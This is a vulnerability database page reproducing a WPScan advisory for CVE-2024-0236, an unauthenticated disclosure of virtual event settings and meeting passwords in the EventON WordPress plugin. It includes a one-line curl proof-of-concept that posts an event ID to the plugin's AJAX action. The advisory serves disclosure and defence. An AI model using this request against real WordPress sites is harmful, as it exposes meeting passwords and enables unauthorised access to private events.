Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbErwan LR (WPScan)WPVDB-ID:09AEB6F2-6473-4DE7-8598-E417049896D7
HistoryJan 10, 2024 - 12:00 a.m.

EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Virtual Event Password Disclosure

2024-01-1000:00:00
Erwan LR (WPScan)
wpscan.com
7
eventon
unauthenticated
virtual event
password
disclosure
ajax
settings
arbitrary
meeting
zoom
poc
software

0.001 Low

EPSS

Percentile

20.7%

JSON

Description The plugins do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom)

PoC

curl -X POST --data “eid=240” ‘http://127.0.0.1/wp-admin/admin-ajax.php?action=eventon_config_virtual_event’ 240 being the ID of a virtual event

CPENameOperatorVersion
eq4.5.5
eq2.2.8

Related

cvelist 1
nvd 1
prion 1
cve 1
wpexploit 1
cvelist
cvelist
CVE-2024-0236 EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Virtual Event Password Disclosure
2024-01-16 15:57:00
nvd
nvd
CVE-2024-0236
2024-01-16 16:15:14
prion
prion
Default credentials
2024-01-16 16:15:00
cve
cve
CVE-2024-0236
2024-01-16 16:15:14
wpexploit
wpexploit
EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Virtual Event Password Disclosure
2024-01-10 00:00:00

0.001 Low

EPSS

Percentile

20.7%

JSON
Related for WPVDB-ID:09AEB6F2-6473-4DE7-8598-E417049896D7
cvelist1nvd1prion1cve1wpexploit1